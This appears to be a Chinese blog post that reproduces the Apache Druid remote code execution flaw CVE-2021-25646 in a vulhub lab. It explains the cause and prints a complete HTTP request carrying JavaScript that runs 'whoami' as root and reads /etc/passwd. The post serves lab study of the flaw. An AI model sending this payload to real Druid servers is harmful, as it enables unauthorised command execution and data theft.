1.准备:
1.1复现环境
漏洞环境:vulnhub靶场
工具准备:burpsuite
1.2环境启动
进入vulnhub目录下的apache-druid目录,进入CVE-2021-25646目录
cd /home/hbesljx/vulhub/apache-druid/CVE-2021-25646docker-compoe启动漏洞环境
docker-compose up -d访问靶机的8888端口。出现apache druid界面即为开启成功!
2.概念说明
2.1 Apache是什么
Apache是世界使用排名第一的Web服务器软件。
2.1 Apache Druid是什么
Apache Druid是一个集时间序列数据库、数据仓库和全文检索系统特点于一体的分析性数据平台。
Alibaba Druid是阿里巴巴开源平台上的一个数据库连接池实现。
3.漏洞原理
Apache Druid包括执行嵌入在各种类型请求中的用户提供的JavaScript代码的能力。这个功能是为了在可信环境下使用,并且默认是禁用的。然而,在Druid 0.20.0及以前的版本中,攻击者可以通过发送一个恶意请求使Druid用内置引擎执行任意JavaScript代码,而不管服务器配置如何,这将导致代码和命令执行漏洞。
4.漏洞复现
4.1 POC
POST /druid/indexer/v1/sampler HTTP/1.1
Host: your-ip:8888
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
{
"type":"index",
"spec":{
"ioConfig":{
"type":"index",
"firehose":{
"type":"local",
"baseDir":"/etc",
"filter":"passwd"
}
},
"dataSchema":{
"dataSource":"test",
"parser":{
"parseSpec":{
"format":"javascript",
"timestampSpec":{
},
"dimensionsSpec":{
},
"function":"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\"sh\",\"-c\",\"whoami\"]).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:123123,test: a}}",
"":{
"enabled":"true"
}
}
}
}
},
"samplerConfig":{
"numRows":10
}
}4.2 访问靶机8888端口并修改数据包
whoami执行成功,root权限。
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
